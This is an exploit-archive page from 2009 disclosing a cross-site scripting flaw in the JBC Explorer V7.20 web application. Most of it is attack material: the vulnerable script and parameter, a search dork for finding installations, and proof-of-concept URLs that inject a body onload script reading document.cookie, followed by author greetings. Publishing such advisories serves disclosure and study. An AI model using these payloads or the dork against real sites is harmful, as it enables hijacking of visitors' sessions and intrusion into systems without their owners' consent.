[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Explorer V7.20 Cross Site Scripting Vulnerability
# Published : 2009-12-20
# Author : Metropolis
# Previous Title : Rumba XML suffers from a cross site scripting vulnerability
# Next Title : Advance Biz Limited <= 1.0 ( Auth Bypass ) SQL injection Vulnerability


###########################################
#
# Script Name : Explorer V7.20 
#
# Version :  V7.20 Release Candidate 1 REV A 
# 
# Bug Type : XSS vulnerability
#
# Found by : Metropolis 
#
# Discovered : 20 December 2009
#
# Download app : http://www.jbc-explorer.info/?action=download&download=16
#
# Dork : JBC explorer [ by Psykokwak & XaV ]
# 
###########################################
 
PoC :
 
http://[target]/[path]/dirsys/arbre.php?0=search&last=1[Xss]
 
example :
 
http://[target]/[path]/dirsys/arbre.php?0=search&last=1<body+onload=alert(document.cookie)>
 
local Example :
 
http://localhost/album/dirsys/arbre.php?0=search&last=1<body+onload=alert(document.cookie)>

[ Greetz: 
 
[~]: Frf2 Az£L Z£L EsSandRe ticlem007 the killers themic Lariane All www.metropolis.thebigbang.fr :[~]